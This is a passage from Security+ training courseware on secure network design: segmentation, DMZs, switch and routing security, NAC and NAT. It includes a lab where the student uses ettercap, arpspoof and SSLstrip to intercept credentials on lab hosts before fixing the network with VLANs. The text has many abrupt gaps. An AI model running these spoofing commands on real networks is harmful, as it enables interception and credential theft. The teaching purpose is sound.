• Understand the types of policies that can be used to configure account security.
• Make sure you know the processes for logging and auditing user account privileges
and network resource access.
What types of access management controls does your organization use? Do you
think these are appropriate for the needs of your organization? Why or why not?
A: Answers will vary. Part of the decision is based on your security requirements
and also whether your OS and applications support the model you want to use. If
you need to use other models than what you are currently using, you will need to
ensure that they are supported.
What items and events does your organization log? Do you think this is
adequate, too much, or too little to monitor? Why?
A: Answers will vary. Based on the needs of the organization, your team will need
to determine which events need to be logged. Having too many events logged
can bog down the server, especially if many success logs are being created when
users successfully log on. You will need to find a balance between gathering the
necessary information and not filling up the resources with log files.
Practice Questions: Additional practice questions are available on the course website.
LESSON INTRODUCTION
Now that you have reviewed the threats and vulnerabilities that can cause damage to your
organization, as well as the systems used to enforce identity and access management, it's time to
focus on securing the network infrastructure. Understanding network components and knowing
how to properly secure an organization's network are two of the most important steps in
becoming a successful security professional.
LESSON OBJECTIVES
In this lesson, you will:
• Implement secure network architecture concepts.
• Install and configure a secure switching infrastructure.
• Install and configure network access control.
• Install and configure a secure routing and NAT infrastructure.
Topic A
Implement Secure Network Architecture
Concepts
EXAM OBJECTIVES COVERED
1.6 Explain the impact associated with types of vulnerabilities.
3.2 Given a scenario, implement secure network architecture concepts.
While you may not be responsible for network design in your current role, it is
important that you understand the vulnerabilities that can arise from weaknesses in
network architecture, and some of the general principles for ensuring a well-designed
network. This will help you to contribute to projects to improve resiliency and to make
recommendations for improvements.
SEGREGATION/SEGMENTATION/ISOLATION
In the context of security, a network segment is one where all the hosts attached to
the segment can communicate freely with one another. Segregation means that the
hosts in one segment are restricted in the way they communicate with hosts in other
segments. They might only be able to communicate over certain network ports, for
instance.
Note: "Freely" means that no network appliances or policies are preventing
communications. Each host may be configured with access rules or host firewalls or other
security tools to prevent access, but the "view from the network" is that hosts in the same
segment are all free to attempt to communicate.
Note: You can read more about some of the configuration issues surrounding air
gapping on Bruce Schneier's blog (https://www.schneier.com/blog/archives/2013/10/
air_gaps.html).
bastion is a defensive structure in a castle. The bastion protrudes from the castle wall
and enables the defenders to fire at attackers that have moved close to the wall. A
bastion host would not be configured with any services that run on the local network,
such as user authentication.
To configure a DMZ, two different security configurations must be enabled: one on the
external interface and one on the internal interface. A DMZ and intranet are on
different subnets, so communications between them need to be routed.
Note: Sometimes the term DMZ (or "DMZ host") is used by SOHO router vendors to mean
an Internet-facing host or zone not protected by the firewall. This might be simpler to
configure and solve some access problems, but it makes the whole network very
vulnerable to intrusion and DoS. An enterprise DMZ is established by a separate network
interface and subnet so that traffic between hosts in the DMZ and the LAN must be
routed (and subject to firewall rules). Most SOHO routers do not have the necessary ports
or routing functionality to create a true DMZ.
It is also quite likely that more than one DMZ will be required as the services that run
in them may have different security requirements. We've already noted a difference
between services designed to be accessible to a public Internet versus those for an
extranet. Some other examples are:
• Dedicated DMZ for employee web browsing and proxy services.
• DMZ for email, VoIP, and conferencing servers.
• Isolate remote access/Virtual Private Network (VPN) traffic.
• Isolate traffic for authorized cloud applications.
• Multi-tier DMZ to isolate front-end, middleware, and backend servers.
These different functions could be implemented either by completely separate DMZs
or by using segmented demilitarized zones.
SCREENED SUBNETS
One important use of subnets is to implement a DMZ. Two firewalls are placed at
either end of the DMZ. One restricts traffic on the external interface; the other restricts
traffic on the internal interface.
THREE-LEGGED FIREWALL
A DMZ can also be established using a single router/firewall appliance. A three-legged
(or triple-homed) firewall is one with three network ports, each directing traffic to a
separate subnet.
SCREENED HOST
Smaller networks may not have the budget or technical expertise to implement a DMZ.
In this case, Internet access can still be implemented using a dual-homed proxy/
gateway server acting as a screened host.
Activity 8-1
Discussing Secure Network
Architecture Concepts
SCENARIO
Answer the following questions to test your understanding of the content covered in
this topic.
1. A recent security evaluation concluded that your company's network design is too
consolidated. Hosts with wildly different functions and purposes are grouped
together on the same logical area of the network. In the past, this has enabled
attackers to easily compromise large swaths of network hosts.
What technique(s) do you suggest will improve the security of the network's
design, and why?
2. What is the purpose (in terms of security) and what are the means of
segmenting a network?
3. What is the distinction between the Internet zone and an extranet zone?
The Internet is an external zone where none of the hosts accessing your
services can be assumed trusted or authenticated. An extranet is a zone
allowing controlled access to semi-trusted hosts, implying some sort of
authentication. The hosts are semi-trusted because they are not under the
administrative control of the organization (as they are owned by suppliers,
customers, business partners, contractors, and so on).
Topic B
Install and Configure a Secure Switching
Infrastructure
EXAM OBJECTIVES COVERED
1.2 Compare and contrast types of attacks.
2.1 Install and configure network components, both hardware- and software-based, to
support organizational security.
2.6 Given a scenario, implement secure protocols.
3.2 Given a scenario, implement secure network architecture concepts.
Now that you are familiar with the components that make up a secure network
architecture, you can start implementing network components to build your own
secure environment. In this topic, you will investigate some common network-level
attacks and the controls and countermeasures you can use to prevent them.
SWITCHING INFRASTRUCTURE
Network topology designs have to be implemented by installing physical network links
and connecting hosts and zones using switches, routers, and firewalls. Network
architecture design starts with the way the OSI model Physical and Data Link layers are
implemented. Cisco recommends designing a campus network with three layers of
hierarchy: access, distribution, and core.
• Access—allowing end-user devices, such as computers, printers, and smartphones,
to connect to the network. Another important function of the access layer is to
prevent the attachment of unauthorized devices.
• Distribution—provides fault-tolerant interconnections between different access
blocks and either the core or other distribution blocks. The distribution layer is
often used to implement traffic policies, such as routing boundaries, filtering, or
Quality of Service (QoS).
• Core—provides a highly available network backbone. Devices such as clients and
server computers should not be attached directly to the core. Its purpose should be
kept simple: provide redundant traffic paths for data to continue to flow around the
access and distribution layers of the network.
Managed switches can be configured with Virtual LANs (VLANs). The VLANs are used to
implement logical segregation of traffic. For example, ports 1 through 10 and 11
through 20 on a switch could be configured as two separate VLANs, typically each with
their own subnet address. Communication between the groups of ports would only be
possible via a router or layer 3 switch. Port-based switching is the simplest means of
configuring a VLAN (static VLANs). Others (dynamic VLANs) include using the host's
MAC address, protocol type, or even authentication credentials.
Viewing VLANs on a Dell switch using the web management interface. (Screenshot used with
permission from Dell.)
experiences lower traffic loads since the bridge only passes signals from one segment
to another if appropriate. The bridge can identify in which segment a host is located by
its MAC address and only forwards traffic for that host over that interface.
Bridge appliances have all been replaced by switches, but the function of a bridge
continues to have an impact on network security because a user may accidentally (or
maliciously) create a bridge from one network to another. A typical example is a laptop
with a bridged connection between the wireless and Ethernet adapters. A computer
could allow wireless clients to connect to it in either an ad hoc network or by being
configured as a soft access point. An ad hoc network is created when wireless stations
are configured to connect to one another in a peer-to-peer topology. This would not
normally be part of a secure network design, but might be required in some special
circumstances, such as communicating with a wireless host that is physically remote
from other network infrastructure.
Generally speaking, bridged and ad hoc connections could be a potential network
backdoor or could cause a switching loop. These issues can be mitigated with loop
protection and port security.
Note: Split tunneling is another example of a potential bridge between different
networks.
LOOP PREVENTION
In a network with multiple bridges, implemented these days as switches and routers,
there may be more than one path for a frame to take to its intended destination. As a
layer 2 protocol, Ethernet has no concept of Time To Live. Therefore, layer 2 broadcast
traffic could continue to loop through a network with multiple paths indefinitely. Layer
2 loops are prevented by the Spanning Tree Protocol (STP), defined in the IEEE
802.1D MAC Bridges standard. Spanning tree is a means for the bridges to organize
themselves into a hierarchy and prevent loops from forming.
An adversary may try to attack STP using a rogue switch or software designed to
imitate a switch. When a switch does not know the correct port to use for a particular
destination MAC address (if the cache has just been flushed, for instance), it floods the
frame out to all ports, even if the frame is unicast, not broadcast. Topology changes in
STP can cause a switch to flush the cache more frequently and to start flooding unicast
traffic more frequently, which can have a serious impact on network performance.
The configuration of switch ports should prevent the use of STP over ports designated
for client devices (access ports). An access port is configured with the portfast
command to prevent STP changes from delaying client devices trying to connect to the
port. Additionally, the BPDU Guard setting should be applied. This causes a
portfast-configured port that receives a BPDU to become disabled. Bridge
Protocol Data Units (BPDUs) are used to communicate information about the
topology and are not expected on access ports, so BPDU Guard protects against
misconfiguration or a possible malicious attack.
ARP in action—An ARP broadcast is used when there is no MAC:IP mapping in the cache and is
received by all hosts on the same network, but only the host with the requested IP should reply. (Image
© 123RF.com.)
In terms of TCP/IPv4, the most significant protocol operating at the Data Link layer is
the Address Resolution Protocol (ARP). ARP maps a network interface's hardware
(MAC) address to an IP address. Normally, a device that needs to send a packet to an IP
address but does not know the receiving device's MAC address broadcasts an ARP
Request packet, and the device with the matching IP responds with an ARP Reply.
MAC spoofing changes the Media Access Control (MAC) address configured on an
adapter interface or asserts the use of an arbitrary MAC address. While a unique MAC
address is assigned to each network interface by the vendor at the factory, it is simple
to override it in software via OS commands, alterations to the network driver
configuration, or using packet crafting software. This can lead to a variety of issues
when investigating security incidents or when depending on MAC addresses as part of
a security control, as the presented address of the device may not be reliable. Because
it operates at the Data Link layer, MAC address spoofing is limited to the local
broadcast domain. MAC spoofing is also the basis of other layer 2 Man-in-the-Middle
attacks.
Packet capture opened in Wireshark showing ARP poisoning. (Screenshot used with permission from
wireshark.org.)
This screenshot shows packets captured during a typical ARP poisoning attack:
• In frames 6-8, the attacking machine (with MAC address ending :4a) directs
gratuitous ARP replies at other hosts (:76 and :77), claiming to have the IP
addresses .2 and .102.
• In frame 9, the .101/:77 host tries to send a packet to the .2 host, but it is received
by the attacking host (with the destination MAC :4a).
• In frame 10, the attacking host retransmits frame 9 to the actual .2 host. Wireshark
colors the frame black and red to highlight the retransmission.
• In frames 11 and 12 you can see the reply from .2, received by the attacking host in
frame 11 and retransmitted to the legitimate host in frame 12.
The usual target will be the subnet's default gateway (the router that accesses other
networks). If the ARP poisoning attack is successful, all traffic destined for remote
networks will be sent to the attacker. The attacker can perform a Man-in-the-Middle
attack, either by monitoring the communications and then forwarding them to the
router to avoid detection, or modifying the packets before forwarding them. The
attacker could also perform a Denial of Service attack by not forwarding the packets.
There are utilities that can detect ARP spoofing attacks. Another option is to use
switches that can perform port authentication, preventing connected devices from
changing their MAC addresses.
A variation of an ARP poisoning attack, MAC flooding, can be directed against a switch.
If a switch's cache table is overloaded by flooding it with frames containing different
(usually random) source MAC addresses, it will typically start to operate as a hub
(failopen mode). The alternative would be to deny network connections to any of the
attached nodes. As hubs repeat all unicast communications to all ports, this makes
sniffing network traffic easier.
Note: The cache table is referred to as content addressable memory (CAM), so the attack
is also called CAM table overflow.
Another option is to configure DHCP snooping. This inspects DHCP traffic arriving on
access ports to ensure that a host is not trying to spoof its MAC address. It can also be
used to prevent rogue (or spurious) DHCP servers from operating on the network.
With DHCP snooping, only DHCP offers from ports configured as trusted are allowed.
• Disable unused management console access methods. For example, if you use SSH,
disable the serial port, HTTP, HTTPS, and Telnet.
• Restrict the hosts that can be used to access the management console by enforcing
an access control list (ACL); restrict permitted management hosts to a single IP
address or subnet, for instance.
• Install the latest firmware updates and review vendor security bulletins to be
forewarned about possible exploits or vulnerabilities.
• Configure the SNMP interface on the switch to report only to an authorized
management station or disable SNMP if it is not required.
Activity 8-2
Discussing Secure Switching
Infrastructure
SCENARIO
Answer the following questions to test your understanding of the content covered in
this topic.
1. Why would you deploy a layer 3 switch in place of an ordinary LAN switch?
A layer 3 switch can perform a routing function to forward (or drop) traffic
between subnets configured on different VLANs. On an enterprise network with
thousands of access ports, this is usually more efficient than forwarding the
traffic via a separate router.
The attacker could trick computers into sending traffic through the attacker's
computer (performing a MitM attack) and, therefore, examine traffic that would
not normally be accessible to him (on a switched network).
6. What steps would you take to secure a network device against unauthorized
reconfiguration?
Topic C
Install and Configure Network Access
Control
EXAM OBJECTIVES COVERED
2.1 Install and configure network components, both hardware- and software-based, to
support organizational security.
The portability of devices such as removable storage, wireless access points, VoIP
phones, cell phones, smartphones, and laptop computers, makes penetrating network
perimeter security more straightforward. The security of these devices is often heavily
dependent on good user behavior. There is also the circumstance of providing guests
with network facilities, such as web access and email. While training and education can
mitigate the risks somewhat, new technologies are emerging to control these threats.
ADMISSION CONTROL
Admission control is the point at which client devices are granted or denied access
based on their compliance with the health policy. Most NAC solutions work on the
basis of preadmission control (that is, the device must meet the policy to gain access).
Post-admission control involves subsequently polling the device to check that it
With preadmission control, supplicant client devices connect to the network via a NAC
policy enforcer, such as a switch, router, or wireless access point. Other options for
the location of the policy enforcer include a VPN remote access gateway or a specially
configured DHCP server. The policy enforcer checks the client credentials with the NAC
policy server and performs machine and user authentication with a RADIUS AAA
server. The client is allocated a suitable IP address by a DHCP server and assigned to a
VLAN by the switch; depending on whether the policy was met, this would allow access
to the network or to a quarantined area or captive web portal only.
Post-admission controls would rely on the NAC policy server polling the client device
once access has been granted or performing a policy check if the configuration of a
client changes or when a client attempts to access a particular server or service.
Defining policy violations in Packet Fence Open Source NAC. (Screenshot used with permission from
packetfence.org.)
Packet Fence supports the use of several scanning techniques, including vulnerability scanners, such as
Nessus and OpenVAS, Windows Management Instrumentation (WMI) queries, and log parsers.
(Screenshot used with permission from packetfence.org.)
Some NAC solutions can perform agentless posture assessment. This is useful when
the NAC solution must support a wide range of devices, such as smartphones and
tablets, but less detailed information about the client is available with an agentless
solution.
If implemented as a primarily software-based solution, NAC can suffer from the same
sort of exploits as any other software. There have been instances of exploits to evade
the NAC admission process or submit false scan results. One fruitful line of attack is to
use virtual machines to evade the initial admission policy; one VM is created that
complies with the policy, and when access is granted, the user switches to a second
non-compliant VM. This is why post-admission control is an increasingly important
requirement for NAC solutions.
REMEDIATION
Remediation refers to what happens if the device does not meet the security profile. A
non-compliant device may be refused connection completely or put in a quarantined
guest network or captive portal.
• Guest network—this would be a VLAN or firewalled subnet (DMZ) granting limited
access to network resources. For example, you might allow visitors with non-
compliant devices to use your Internet routers to browse the web and view their
email but not grant them any access to your corporate network.
• Quarantine network—this is another type of restricted network, usually based on
a captive portal. A captive portal allows only HTTP traffic and redirects the HTTP
traffic to a remediation server. The remediation server would allow clients to install
OS and anti-virus updates in order to achieve or return to compliance.
Activity 8-3
Discussing Network Access Control
SCENARIO
Answer the following questions to test your understanding of the content covered in
this topic.
1. What is EAPoL?
A switch that support 802.1X port-based access control can enable a port but
allow only the transfer of Extensible Authentication Protocol over LAN (EAPoL)
traffic. This allows the client device and/or user to be authenticated before full
network access is granted.
Some NAC solutions perform host health checks via a local agent, running on
the host. A dissolvable agent is one that is executed in the host's memory and
CPU but not installed to a local disk.
The ability to logically park a client that does not meet the health policy in a
more restricted area of the network—for example, these areas may only allow
basic Internet access, or be given access to required software patches, and so
on.
To identify and remove any host or device that is present on the network
without authorization. Rogue systems could be PCs, hardware servers, laptops,
mobile devices, appliances, software servers and applications, or virtual
machines.
Topic D
Install and Configure a Secure Routing
and NAT Infrastructure
EXAM OBJECTIVES COVERED
1.2 Compare and contrast types of attacks.
2.1 Install and configure network components, both hardware- and software-based, to
support organizational security.
2.6 Given a scenario, implement secure protocols.
3.2 Given a scenario, implement secure network architecture concepts.
Once you have created segments and zones to represent your secure network
topology, you do need to facilitate at least some communications between these
segregated areas. Network traffic is moved around logical subnetworks at layer 3 by
routers. In this topic, you will learn how to secure routing infrastructure.
ROUTING INFRASTRUCTURE
Routers can serve both to join physically remote networks and subdivide a single
network into multiple subnets. Routers that join different types of networks are called
border or edge routers. These are typified by distinguishing external (Internet-facing)
and internal interfaces. These devices are placed at the network perimeter. Edge
routers stand in contrast to routers that handle traffic moving within the LAN. This
function is likely to be performed by a layer 3 switch on an enterprise network.
The following graphic shows a simplified example of a typical routing and switching
infrastructure configuration. Basic layer 2 switches provide ports and Virtual LANs
(logical groupings of clients) for wired and (via an access point) wireless devices. Traffic
between logical networks is controlled by layer 3 switches with LAN routing
functionality. WAN/edge routers provide services such as web, email, and
communications access for corporate clients and VPN access to the corporate network
for remote clients.
ROUTER CONFIGURATION
Routes between networks and subnets can be configured manually, but most routers
automatically discover routes by communicating with each other. Dynamic routers
exchange information about routes using routing protocols, such as Open Shortest
Path First (OSPF), Routing Information Protocol (RIP), and Border Gateway Protocol
(BGP). It is important that this traffic be separated from channels used for other types
of data. Routing protocols do not usually have effective integral security mechanisms,
so they need to run in an environment where access is very tightly controlled.
A hardware router is configured and secured in the same way as a switch (using a web
or command-line interface, for instance). The main difference is that a router is likely to
have an exposed public interface. This means that properly securing the router is all
the more important. Routers are often more complex than switches and it is
consequently easier to make mistakes. A software router is configured using the
appropriate tools in the underlying NOS. As well as the configuration of the routing
functions, the performance and security of the underlying server should be considered
too.
ROUTING ATTACKS
Routing is subject to numerous vulnerabilities, including:
• Fingerprinting—port scanning using a tool such as Nmap can reveal the presence of
a router and which dynamic routing and management protocols it is running.
• Software exploits in the underlying operating system. Hardware routers (and
switches) have an embedded operating system. For example, Cisco devices typically
use the Internetwork Operating System (IOS). Something like IOS suffers from fewer
exploitable vulnerabilities than full network operating systems. It has a reduced
attack surface compared to a computer OS, such as Windows.
Note: On the other hand, SOHO routers and DSL/cable modems can be particularly
vulnerable to unpatched exploits.
Many companies are only allocated a single or small block of addresses by their ISP.
Network Address Port Translation (NAPT) or NAT overloading provides a means
for multiple private IP addresses to be mapped onto a single public address. NAT
overloading works by allocating each new connection a high-level TCP or UDP port. For
example, say two hosts (192.168.0.101 and 192.168.0.102) initiate a web connection at
the same time. The NAPT service creates two new port mappings for these requests
(192.168.0.101:61101 and 192.168.0.102:61102). It then substitutes the private IPs for
the public IP and forwards the requests to the public Internet. It performs a reverse
mapping on any traffic returned using those ports, inserting the original IP address and
port number, and forwards the packets to the internal hosts.
application (say, HTTP/port 80) and sends them to a designated host and port on the
LAN.
Configuring port forwarding on a pfSense firewall appliance—This rule forwards any HTTP traffic
received on the appliance's WAN interface to the 10.1.0.10 host on the LAN. (Screenshot used with
permission from pfsense.org.)
At the device level, SDN can use virtualized appliances or physical appliances. The
appliances just need to support the southbound API of the network controller
software.
This architecture saves the network administrator the job and complexity of
configuring each appliance with appropriate settings to enforce the desired policy. It
also allows for fully automated deployment (or provisioning) of network links,
appliances, and servers. Network administrators can more easily manage the flow and
logistics of their network, and adjust traffic on-the-fly based on their needs. An
architecture designed around SDN may also provide greater security insight because it
enables a centralized view of the network. This makes SDN an important part of the
latest software deployment and disaster recovery technologies.
Note: To learn more, watch the related Video on the course website.
Activity 8-4
Discussing Secure Routing and NAT
Infrastructure
SCENARIO
Answer the following questions to test your understanding of the content covered in
this topic.
3. What technology would you use to enable private addressing on the LAN
and still permit hosts to browse the web?
Network Address Translation (NAT). You could also accomplish this using a
proxy server.
Activity 8-5
Implementing a Secure Network Design
SCENARIO
In this activity, you will first demonstrate a Man-in-the-Middle attack using ARP
spoofing, and then reconfigure the network so that different computer groups are
segmented by using VLANs and subnets. This activity is designed to test your
understanding of and ability to apply content examples in the following CompTIA
Security+ objectives:
• 1.2 Compare and contrast types of attacks.
• 2.1 Install and configure network components, both hardware- and software-based,
to support organizational security.
• 3.2 Given a scenario, implement secure network architecture concepts.
Here is a reference image of the network topology in your lab environment.
1. Configure the MS1 VM with a web service that requires user authentication and
protect the authentication mechanism using a server-side certificate and TLS.
Install a URL rewrite module to the web server (IIS) so that you can redirect client
connections requesting plain HTTP sessions to secure HTTPS sessions.
a) Open a connection window for the MS1 VM and log on with the credentials
515support\Administrator and Pa$$w0rd
b) In File Explorer, open C:\LABFILES. Double-click rewrite_amd64_en-US.exe. Check
the I accept the terms in the License Agreement check box, and then select Install.
Select Yes to confirm the UAC prompt.
c) Once setup is complete, select Finish.
2. Use IIS Manager to request a certificate for the web server, using the common
name updates.corp.515support.com.
a) In Server Manager, select Tools→Internet Information Services (IIS) Manager.
b) In the Connections pane, select the MS1 server icon. In the Home pane, open the
Server Certificates applet.
c) In the Actions pane, select Create Domain Certificate.
d) When the Create Certificate wizard starts, in the Common Name field, type
updates.corp.515support.com
e) In the other fields, enter 515support or any city or state as appropriate.
f) Select Next.
g) On the Online Certification Authority page, select the Select button, then select
515support-CA and select OK.
h) In the Friendly name box, type updates.corp.515support.com Domain-issued
Certificate and then select Finish.
After a few seconds, the certificate request will be granted.
Configuring a URL rewrite rule. (Screenshot used with permission from Microsoft.)
g) Scroll down to the Action group, in the Action type list box, select Redirect.
h) In the Redirect URL box, type https://{HTTP_HOST}{REQUEST_URI}
6. A rogue host with access to a network segment can use ARP spoofing to intercept
traffic. To demonstrate this type of attack, you will perform ARP spoofing to
monitor the traffic passing between a client and the MS1 web server. Attach KALI
to the LAN.
a) Open the connection window for the KALI VM. From the connection window menu,
select File→Settings.
b) Select the eth0 node. In the right-hand pane, under Virtual switch, select vLOCAL
and then select OK.
c) Log on with the credentials root and Pa$$w0rd
7. Use the Ettercap tool to launch an ARP spoofing attack and snoop on the traffic
passing between the web server (10.1.0.2) and client workstations (10.1.0.1xx).
a) Right-click the desktop and select Open Terminal.
b) Run ip a and record the MAC address for eth0.
______________________________________
c) Run the following command:
ettercap -qTM arp /10.1.0.100-110// /10.1.0.2//
This command sets up Ettercap to poison any hosts in the DHCP range (you can
assume the adversary was able to discover this) attempting to contact the server
(10.1.0.2).
j) Select the browser padlock icon to confirm that you are viewing the page over a
secure connection.
k) Close the browser.
l) Switch back to KALI and stop the packet capture.
If you check the MAC addresses of the Windows VMs, you will find that these are the
targets.
b) Look at the first TCP packet (color-coded green), and note the MAC addresses used.
Observing ARP spoofing in a Wireshark packet capture. (Screenshot used with permission
from Wireshark.)
c) Now look at the retransmission packet (color-coded black). Which VM MAC addresses
are used?
The source is KALI and the destination is MS1. KALI has to retransmit each
intercepted packet to prevent the communications from failing. This creates a highly
distinctive ARP-spoofing signature in the packet trace.
d) Observe the HTTP connection with the redirect in operation.
e) Now look at the TLS handshake (color-coded purple) packets to follow the
establishment of the secure session.
All these packets are being retransmitted, too (interspersed with lots more gratuitous
ARP packets).
f) Also verify that no authentication credentials can be discovered, nor any other
application information, once the server has agreed on a cipher with the client.
Even though the adversary can snoop on traffic, the contents of packets are protected by
TLS. (Screenshot used with permission from Wireshark.)
g) In the terminal, type q to stop the ARP poisoning attack.
a) On the KALI VM, in the terminal, run the following three commands (ignore any line
breaks in the iptables command):
Enter the commands shown to start an SSLstrip attack. (Screenshot used with permission
from Moxie.org.)
This sets KALI to forward any traffic it receives on port 80 to port 8080 and configures
the SSLstrip proxy to listen on that port.
b) Right-click the desktop and select Open Terminal. In the second terminal, run the
following command, substituting xx for the octet of the PC1 VM's IP address:
arpspoof -i eth0 -t 10.1.0.2 10.1.0.1xx
Running the arpspoof command. (Screenshot used with permission from Monkey.org.)
c) Right-click the desktop and select Open Terminal. In the third terminal, run the
following command, substituting xx for the octet of the PC1 VM's IP address:
arpspoof -i eth0 -t 10.1.0.1xx 10.1.0.2
d) In Wireshark, select the Start Capture button and select Continue without Saving
when prompted.
e) Switch to the PC1 VM, press Windows+R, then type http://updates.corp.
515support.com and press Enter.
f) When prompted, enter the credentials, but do not save them. Verify that the browser
is warning you that the connection is not secure.
Browser warning of an unsecure connection—Unfortunately, many users will not read the
warning. (Screenshot used with permission from Microsoft.)
Note: If you see Page can't be displayed errors, or if you are not prompted
for your credentials, use the Refresh key (F5).If you still aren't prompted for
credentials, clear the cache for the browser then reload it again.
i) Look for a GET/HTTP/1.1 packet (you might have to look past several reconnection
attempts with no credentials included).
1. 10.1.0.1xx (PC1) establishes an HTTP connection with what it thinks is 10.1.0.2,
but if you look at the MAC address, you will see that it is the KALI VM. You can
read the credentials easily.
2. 10.1.0.192 (KALI) establishes an HTTPS connection with 10.1.0.2 (the real web
server) and replays the authorization packet it has captured. The server accepts
the credentials and establishes a session.
3. KALI proxies the client requests and server responses between the two
machines.
10. In the current network topology, any device can connect to the vLOCAL virtual
switch and participate in the network. Segmenting the network would give you
better control over the communication flows you expect between clients and
servers. You don’t have a very complex network or the sort of sophisticated port
security features available on vendor switches, but to illustrate the point, you can
put the servers and clients into separate VLANs and subnets.
a) On the HOST, in the Hyper-V Manager console, right-click the DC1 VM and select
Settings. Select the Network Adapter node, then check the Enable virtual LAN
identification check box and type 10 in the text box. Select OK.
Assigning the VM interface to a specific VLAN. (Screenshot used with permission from
Microsoft.)
b) Repeat to add the MS1 VM into VLAN 10 too.
c) Use the same procedure to configure PC1, PC2, and KALI into VLAN 20.
d) Try to access http://updates.corp.515support.com from either Windows client VM.
It will not work (refresh the page to ensure that you are not looking at cached site
files).
11. Add a network path between the two VLANs by repurposing the interfaces on the
VyOS router.
a) On the HOST, in Hyper-V Manager, right-click the RT1-LOCAL VM and select
Settings.
b) Select the eth0 node attached to the vLOCAL switch. Check the Enable virtual LAN
identification check box and type 10 in the text box.
c) Expand the eth0 node. Select the Advanced Features node, then record the MAC
address assigned to this interface:
VLAN 10:
d) Select the eth1 node currently attached to the vISP switch. From the Virtual switch
list, select vLOCAL.
e) Check the Enable virtual LAN identification check box and type 20 in the text box.
f) Expand the eth1 node. Select the Advanced Features node, then record the MAC
address assigned to this interface:
VLAN 20:
g) Select OK.
Reconfiguring the router VM so that its interfaces are both connected to the vLOCAL switch
but placed in different VLANs. (Screenshot used with permission from Microsoft.)
12. In effect, this router now has interfaces connected to two ports on the same
switch. Each port is in a different VLAN. Configure the router to use different
subnets for each VLAN.
Network topology—Hosts in VLAN 20 must use the router to contact hosts in VLAN 10. (Image ©
123RF.com.)
d) Verify that eth0 has the same MAC address that you listed for the adapter connected
to VLAN 10 and that eth1 is the adapter connected to VLAN 20.
Matching the interfaces in VyOS to the virtual adapters configured in Hyper-V. (Screenshot
used with permission from vyos.io.)
e) Press Enter to scroll or just type q to quit the configuration readout.
f) Type conf and press Enter to use configuration mode.
g) Enter the following commands to configure the interfaces:
set interfaces ethernet eth0 address 10.1.0.254/24
set interfaces ethernet eth1 address 10.20.0.254/24
commit
save
exit
show conf
q
show ip route
h) Use the confirmation screens to verify that the parameters are correct. You do not
need to configure any routing protocol because the interfaces are directly connected.
13. Provide updated addressing information for the VMs in VLAN 20 and its new
subnet. You could configure a new DHCP server (VyOS has one), but you can also
use the existing DHCP service on MS1. To do that, you have to configure a relay
agent on the router to transfer DHCP messages between the client subnet and the
server subnet.
a) Type conf and press Enter to use configuration mode.
b) Run the following commands to configure a DHCP relay agent:
set service dhcp-relay interface eth0
set service dhcp-relay interface eth1
set service dhcp-relay server 10.1.0.2
commit
save
exit
show conf
14. Configure the new subnet on the MS1 VM so that the DHCP server can offer
addresses in the new subnet scope.
a) Switch to the MS1 VM. If necessary, sign on with the credential 515support
\Administrator and Pa$$w0rd
b) In Server Manager, select Tools→DHCP. Expand the MS1 server and select the IPv4
node.
c) Right-click the IPv4 node and select New Scope.
d) On the first page of the New Scope wizard, select Next.
e) In the Name box, type 515support Client Net Scope and select Next.
f) In the Start IP address box, type 10.20.0.101 and End IP address box, type
10.20.0.110.
g) Adjust the Length value to 24 then select Next.
h) On the Add Exclusions page, select Next.
i) On the Lease Duration page, select Next.
j) On the Configure DHCP Options page, ensure that the Yes radio button is selected
and select Next.
k) On the Router page, in the IP address box, type 10.20.0.254 and select the Add
button.
l) Select Next.
m) On the Domain Name and DNS Servers page, the required information (corp.
515support.com and 10.1.0.1) should be present already. Select Next.
n) On the WINS Servers page, select Next.
o) On the Activate Scope page, ensure that the Yes radio button is selected and select
Next.
p) Select Finish.
q) Run the following commands in elevated command prompt windows on the PC1 and
PC2 VMs to use the new address scope:
ipconfig /release
ipconfig /renew
r) Verify that you can connect to the server resources, such as the website http://
updates.corp.515support.com and the file share \\DC1\LABFILES.
15. If you imagine how these ports may be mapped to physical infrastructure, this
new topology helps to physically restrict network access to critical segments. The
ports in VLAN 10 would be available only with physical access to the server room.
All wall ports in office areas would be connected to VLAN 20 switch ports. ACLs
can be configured on the router to filter and control traffic passing between them.
Note that rogue devices can still be attached to VLAN 20 and perform ARP
spoofing on traffic being passed to and from the default gateway, however. On
KALI, configure the adapter to use a valid address on the new subnet.
a) On the KALI VM, select the Network icon in the top panel and select Wired
Connected→Wired Settings.
h) On the KALI VM, in the terminal, type q to halt the spoofing attack, then in
Wireshark, stop the packet capture and observe that the SMB session has been
captured by the MitM attack.
Consequently, network segmentation has to be combined with endpoint security,
where you restrict network access at the device level. You also need to use secure
protocols to protect any exchange of confidential data.
Summary
In this lesson, you started to look at the requirements and systems used to implement
a secure network design, focusing on the network topology, plus switching and routing
protocols and technologies.
• Understand the use of segmentation to create different network zones and the
technologies that can be used to segregate these zones.
• You should be aware of the risks posed by Man-in-the-Middle and spoofing attacks
where an adversary can access the local network segment.
• You should understand the roles played by switches and routers in the network
topology and how to configure secure switching and routing services, including
network address translation (NAT).
• You should be able to implement endpoint security and network access control
(NAC) to provide defense in depth.
A: Answers will vary. Students may come from campus environments with layers of
core/distribution switching distinct from the access layer. Others may support
SOHO networks with a single layer of switches, but possibly still using VLANs for
segmentation. Discuss when it becomes appropriate to upgrade from a screened
host approach to edge connectivity to a DMZ design.
A: Answers will vary. Students will likely have experience with ACLs and DMZs, and
may use NAC depending on how their enterprise network is designed. Most will
hopefully establish network baselines so that they can compare their day-to-day
operations with expected performance. Analyzing network traffic flows through
management and monitoring tools is also a common way to identify any
deviations from the baseline or other security violations on the network level.
Practice Questions: Additional practice questions are available on the course website.
LESSON INTRODUCTION
In addition to the secure switching and routing appliances and protocols used to implement
network connectivity, the network infrastructure design must also include security appliances to
ensure confidentiality, integrity, and availability of services and data. Again, while you might not be
directly responsible for network design at this point, you should understand the issues in placing
these devices appropriately within the network and configuring them correctly.
LESSON OBJECTIVES
In this lesson, you will:
• Install and configure firewalls and proxies.
• Install and configure load balancers.
• Install and configure intrusion detection/prevention systems.
• Install and configure DLP systems.
• Install and configure logging and SIEM systems.
Topic A
Install and Configure Firewalls and
Proxies
EXAM OBJECTIVES COVERED
2.1 Install and configure network components, both hardware- and software-based, to
support organizational security.
2.3 Given a scenario, troubleshoot common security issues.
2.4 Given a scenario, analyze and interpret output from security technologies.
3.2 Given a scenario, implement secure network architecture concepts.
The firewall is one of the longest serving types of network security control, developed
to segregate some of the first Internet networks in the 1980s. Since those early days,
firewall types and functionality have both broadened and deepened. As a network
